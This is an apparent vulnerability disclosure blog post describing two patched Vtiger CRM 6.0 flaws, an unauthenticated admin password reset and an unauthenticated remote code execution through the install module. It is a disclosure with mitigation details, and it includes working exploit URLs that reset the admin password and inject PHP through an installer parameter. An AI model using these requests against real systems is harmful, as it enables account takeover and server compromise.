Navixia finds critical vulnerabilities in Vtiger CRM

Robin François
Cybersecurity Blog

The following article describes the details of two critical vulnerabilities found in Vtiger CRM by the Navixia Research Team.

These vulnerabilites have been reported to the Vtiger Security team and have now been fixed and can be found in patch 2 issued on March 16, 2014 (see also changeset 14043). A CVE has been attached with the following references:

  • Unauthenticated Password Reset CVE-2014-2269
  • Unauthenticated Remote Code Execution CVE-2014-2268

Vtiger is a well-known web-based Customer Relationship Managemement system (CRM) with a worldwide customer base. This article presents two critical vulnerabilities found in this web application. Validation has been done on the latest stable version (6.0) dated January 10, 2014.

Summary

Product: Vtiger CRM

Vendor: Vtiger Systems (India) Private Limited

Vulnerable Version: 6.0.0 (including Security Patch1), 6.0 RC, 6.0 Beta

Tested Version: 6.0.0

Vendor Notification: March 04 2014

Public Disclosure: April 10 2014

Vulnerabilities:

  • CVE-2014-2269: Unauthenticated Password Reset
  • CVE-2014-2268: Unauthenticated Remote Code Execution

Discovered and Provided By: Navixia SA Research Team

Mitigation: Apply Security Patch 2 for Vtiger 6.0 (issued on March 16, 2014)

CVE-2014-2269 Unauthenticated Password Reset

The normal way for users to change their password is by requesting forgotPassword.php with the GET parameters username and email.This page verifies the data and if they are correct, an email is sent to the user. This email contains a unique link to a reset password page.

forgotPassword.php snippet

$options = array(
  'handler_path' => 'modules/Users/ForgotPassword.php',
  'handler_class' => 'Users_ForgotPassword_Handler',
  'handler_function' => 'changePassword',
  'handler_data' => array(
      'username'=>$username,
      'email'=>$email
  )
);
$trackURL = Vtiger_ShortURL_Helper::generateURL($options);
$contents = 'Hi '.$username.', <br>
           This email was sent to you as you submitted the request to change password for Vtiger CRM.<br>
           Please follow this link to reset your password. <br><br>'.$trackURL;
$mail = new PHPMailer();
setMailerProperties($mail,'Request : ForgotPassword - vtigercrm',
        $contents,'support[at]vtiger.com',$username,$email);
$status = MailSend($mail);

On the reset password page, when the user completes the form and sends it, the request looks like this:

GET modules/Users/ForgotPassword.php ?username=user&password=newpassword&confirmPassword=newpassword

modules/Users/actions/ForgotPassword.php:

class Users_ForgotPassword_Action {
    public function changePassword($request){
        $request = new Vtiger_Request($request);
        $viewer = Vtiger_Viewer::getInstance();
        $username = $request->get('username');
        $newPassword = $request->get('password');
        $confirmPassword = $request->get('confirmPassword');
        $userId = getUserId_Ol($username);
        $user = new Users();
        $user->retrieve_entity_info($userId, 'Users');
        $wsUserId = vtws_getWebserviceEntityId('Users', $userId);
        vtws_changePassword($wsUserId, '', $newPassword, $confirmPassword, $user);
        $viewer->assign('USERNAME', $username);
        $viewer->assign('PASSWORD', $newPassword);
        $viewer->view('FPLogin.tpl', 'Users');
    }
    public static function run($request){
        $instance = new self();
        $instance->changePassword($request);
    }
}
Users_ForgotPassword_Action::run($_REQUEST);

No access control or restriction is enforced when the "changePassword" function is called. Any unauthenticated user can forge a request using the following format, resetting the "admin" password to "navixia".

Furthermore, the Administrator account name cannot be changed and is fixed to "admin".

Exploit

http:// site/modules/Users/actions/ForgotPassword.php?username=admin&password=navixia&confirmPassword=navixia

CVE-2014-2268 Unauthenticated Remote Code execution

Vtiger works with modules which have multiple actions/views. Those modules inherit Vtiger_Action_Controller and Vtiger_View_Controller classes. The method process is used to call these actions, however they also inherit preProcess and postProcess classes.

includes/main/WebUI.php

...
 66         protected function triggerPreProcess($handler, $request) {
 67                 if($request->isAjax()){
 68                         return true;
 69                 }
 70                 $handler->preProcess($request);
 71         }
 72 
 73         protected function triggerPostProcess($handler, $request) {
 74                 if($request->isAjax()){
 75                         return true;
 76                 }
 77                 $handler->postProcess($request);
 78         }
...
183                                 $this->triggerPreProcess($handler, $request);
184                                 $response = $handler->process($request);
185                                 $this->triggerPostProcess($handler, $request);
...

The preProcess and postProcess methods are called only if the request is not an AJAX request. This verification takes place using the well-known X-REQUESTED-WITH HTTP header. Vtiger uses the presence of this header to identify the kind of request.

includes/http/Request.php

...
180         function isAjax() {
181                 if(!empty($_SERVER['HTTP_X_PJAX']) && $_SERVER['HTTP_X_PJAX'] == true) {
182                         return true;
183                 } elseif(!empty($_SERVER['HTTP_X_REQUESTED_WITH'])) {
184                         return true;
185                 }
186                 return false;
187         }
...

We found an interesting module called Install. This module has a view called Index. The verification takes place in the preProcess method.

We can easily trigger a re-installation of the application with a request containing X-Requested-With HTTP header.

modules/Install/views/Index.php

...
29         public function preProcess(Vtiger_Request $request) {
30                 date_default_timezone_set('Europe/London');
31                 // Added to redirect to default module if already installed
32                 $configFileName = 'config.inc.php';
33                 if(is_file($configFileName) && filesize($configFileName) > 0) {
34                         $defaultModule = vglobal('default_module');
35                         $defaultModuleInstance = Vtiger_Module_Model::getInstance($defaultModule);
36                         $defaultView = $defaultModuleInstance->getDefaultViewName();
37                         header('Location:index.php?module='.$defaultModule.'&view='.$defaultView);
38                         exit;
39                 }
...

Let's focus on step 7 of the installation:

modules/Install/views/Index.php

...
164         public function Step7(Vtiger_Request $request) {
165                 // Set favourable error reporting
166                 error_reporting(E_ALL & ~E_NOTICE & ~E_DEPRECATED);
167 
168                 $moduleName = $request->getModule();
169                 if($_SESSION['config_file_info']['authentication_key'] != $request->get('auth_key')) {
170                         die(vtranslate('ERR_NOT_AUTHORIZED_TO_PERFORM_THE_OPERATION', $moduleName));
171                 }
172 
173                 // Create configuration file
174                 $configParams = $_SESSION['config_file_info'];
175                 $configFile = new Install_ConfigFileUtils_Model($configParams);
176                 $configFile->createConfigFile();
...

Parameters used to create the configuration file are stored in a session variable called config_file_info. A verification is made on auth_key, this variable is defined in step 5 of the installation.

We can easily retrieve this variable looking at the source code of the page.

With this information, we can create a configuration file with our own PHP code inside.

Exploitation:

  • Stage1 http:// site/index.php?module=Install&view=Index&mode=Step5&db_name=whatever%27;%20phpinfo(); retrieves the auth_key in the source code of the page
  • Stage2 http:// site/index.php?module=Install&view=Index&mode=Step7&auth_key=[retrieved_key]

A Metasploit vtiger_install_rce module has been developed and merged into the framework (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/vtiger_install_rce.rb).